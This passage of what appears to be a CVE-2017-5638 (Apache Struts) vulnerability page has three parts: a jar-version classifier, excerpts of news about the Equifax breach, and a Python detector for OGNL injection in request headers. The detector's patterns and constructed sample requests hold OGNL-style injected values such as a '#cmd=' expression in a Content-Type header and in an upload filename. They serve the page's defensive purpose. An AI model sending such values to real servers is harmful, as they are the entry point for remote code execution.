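    "/opt/tomcat/webapps/portal/WEB-INF/lib/struts2-core-2.5.10.1.jar",
    "/opt/tomcat/webapps/legacy/WEB-INF/lib/struts2-core-2.5.10.jar",
]

if __name__ == "__main__":
    for path, version, affected in classify_paths(SAMPLE_PATHS):
        state = {True: "AFFECTED", False: "fixed", None: "not rated"}[affected]
        print(f"{state:10} {version:9} {path}")
```

The four-component version is the case to get right: a naive string comparison or a fixed three-part parse puts 2.5.10 and 2.5.10.1 in the wrong order, and 2.5.10 is the last affected 2.5 release. Jars packed inside a deployed WAR or EAR need unpacking first, since os.walk only sees files on disk.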

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down
The Register • Simon Sharwood, APAC Editor • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.
The retirements and more details about the company's mega-breach are revealed in a new entry to equifaxsecurity2017.com in which the company describes what it knew, when it knew it, and how it responded.
The update reveals that the attack hit the company's “U.S. o...

Equifax mega-breach: Security bod flags header config conflict
The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.
The finding from Helme comes as a date was confirmed for the Equifax CEO to appear before Congress earlier next month, and the FTC said it was investigating the credit reference agency.
“Many of the headers are more about addressing the basics, but as a site that...

Equifax Confirms March Struts Vulnerability Behind Breach
Threatpost • Chris Brook • 14 Sep 2017

Equifax said the culprit behind this summer’s massive breach of 143 million Americans was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.
The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman told Reuters on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.
On We...

Missed patch caused Equifax data breach
The Register • Simon Sharwood, APAC Editor • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

Equifax has revealed that the cause of its massive data breach was a flaw it should have patched weeks before it was attacked.
The company has updated its www.equifaxsecurity2017.com/ site with a new “A Progress Update for Consumers” that opens as follows:
As the Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017. Doubt us? Here's the NIST notification that mentions it as being notified on March 10th.
Equifax was breached in “mid-May...

Credit reference agencies faulted for poor patching
The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year.
The security shortcoming raises important questions following the disclosure of a mega-breach at Equifax last week that affected data on 143 million Americans and an as-yet unknown number of Canadians and Brits. Equifax only said that an unspecified web ...

Apache Foundation Refutes Involvement in Equifax Breach
Threatpost • Chris Brook • 11 Sep 2017

A group of developers behind Apache Struts, believed by some to be the culprit behind last week’s Equifax breach, took umbrage with those claims over the weekend.
René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any was exploited.
The letter, which was written on behalf of the Struts PMC, was spurred by an internal analyst report...

Patch Released for Critical Apache Struts Bug
Threatpost • Tom Spring • 05 Sep 2017

The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.
All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.
“This particular vulnerability allows a remote attacker t...

Attacks Heating Up Against Apache Struts 2 Vulnerability
Threatpost • Michael Mimoso • 09 Mar 2017

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was patched and proof-of-concept exploit code was introduced into Metasploit.
The vulnerability, CVE-2017-5638, was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.
“The second someone starts working on a Me...

Apache Struts 2 needs patching, without delay. It's under attack now
The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

Infosec researchers have found a “dire” zero-day in Apache Struts 2, and it's under active attack.
If you're a sysadmin using the Jakarta-based file upload Multipart parser under Apache Struts 2, Nick Biasini of Cisco's Talos advises applying the latest upgrade immediately.
CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site.
Talos's input adds urgency to getting the upgrade, because the organisation “found a high number of exploitation events. The ma...
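The March 2017 reports above describe requests whose Content-Type header carries an OGNL expression aimed at the Jakarta Multipart parser. The following is an added example, not code from this page, Talos, Rapid7 or the Struts project: a small Python checker that flags a raw HTTP request when one of the three header fields the advisory names (Content-Type, Content-Disposition, Content-Length), either at the top of the request or inside a multipart part, contains an OGNL marker. The marker list and the sample requests are constructed for the example and are assumptions, not a vendor signature.

```python
import re
from typing import List, Tuple

# The three header fields the advisory names as the injection point; the
# vulnerable Jakarta Multipart parser copied them into its error messages.
SUSPECT_HEADERS = ("content-type", "content-disposition", "content-length")

# OGNL markers: "%{" and "${" open a Struts expression and "#cmd=" is the
# assignment the March 2017 in-the-wild requests carried.  Assumed heuristic
# for this example; extend it with whatever your own captures show.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#cmd\s*=", re.IGNORECASE)


def split_request(raw: str) -> Tuple[List[str], str]:
    """Return (header lines without the request line, body) of a raw request."""
    head, _, body = raw.partition("\r\n\r\n")
    return head.split("\r\n")[1:], body


def suspect_header_values(lines: List[str]) -> List[Tuple[str, str]]:
    """(lower-cased name, value) for each suspect header among the lines."""
    found = []
    for line in lines:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in SUSPECT_HEADERS:
            found.append((name.strip().lower(), value.strip()))
    return found


def s2_045_indicators(raw_request: str) -> List[str]:
    """Names of suspect headers whose value carries an OGNL marker.

    Top-level request headers are the S2-045 vector.  Each multipart part's
    own header lines are checked too, prefixed "part:", because the S2-046
    advisory listed in the references covers the Content-Disposition of a
    part inside the body.  An empty list means nothing matched.
    """
    top, body = split_request(raw_request)
    hits = [n for n, v in suspect_header_values(top) if OGNL_MARKERS.search(v)]
    # Parts start with a boundary line; prefixing CRLF makes the first part
    # split like the rest.  The closing "--boundary--" yields no headers.
    for part in ("\r\n" + body).split("\r\n--")[1:]:
        part_head = part.partition("\r\n\r\n")[0].split("\r\n")[1:]
        hits += ["part:" + n for n, v in suspect_header_values(part_head)
                 if OGNL_MARKERS.search(v)]
    return hits


# Constructed sample requests, not captured traffic.
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=XyZ\r\nContent-Length: 97\r\n\r\n"
    "--XyZ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"report.pdf\"\r\n"
    "Content-Type: application/pdf\r\n\r\n%PDF-1.4\r\n--XyZ--\r\n"
)
SUSPECT_HEADER = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: %{(#cmd='id')}\r\nContent-Length: 0\r\n\r\n"
)
SUSPECT_PART = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=XyZ\r\n\r\n"
    "--XyZ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"%{#cmd='id'}\"\r\n\r\n"
    "abc\r\n--XyZ--\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_UPLOAD), ("header", SUSPECT_HEADER), ("part", SUSPECT_PART)):
        print(label, s2_045_indicators(req) or "clean")
```

A legitimate multipart upload does not match because its Content-Type value is a plain media type with a boundary parameter. Treat this as a triage filter over captures or proxy logs: a clean result says nothing about whether the server is patched, which only the deployed Struts version (2.3.32 / 2.5.10.1 or later) settles.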

References

CWE-20
http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securityfocus.com/bid/96729
http://www.securitytracker.com/id/1037973
https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
https://cwiki.apache.org/confluence/display/WW/S2-045
https://cwiki.apache.org/confluence/display/WW/S2-046
https://exploit-db.com/exploits/41570
https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a
https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228
https://github.com/mazen160/struts-pwn
https://github.com/rapid7/metasploit-framework/issues/8064
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_us
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_us
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_us
https://isc.sans.edu/diary/22169
https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
https://packetstormsecurity.com/files/141494/S2-45-poc.py.txt
https://security.netapp.com/advisory/ntap-20170310-0001/
https://struts.apache.org/docs/s2-045.html
https://struts.apache.org/docs/s2-046.html
https://support.lenovo.com/us/en/product_security/len-14200
https://twitter.com/theog150/status/841146956135124993
https://www.exploit-db.com/exploits/41614/
https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
https://www.kb.cert.org/vuls/id/834067
https://www.symantec.com/security-center/network-protection-security-advisories/SA145
https://www.rapid7.com/db/vulnerabilities/struts-cve-2017-5638
https://tools.cisco.com/security/center/viewAlert.x?alertId=52972
https://nvd.nist.gov
https://www.exploit-db.com/exploits/41570/
https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl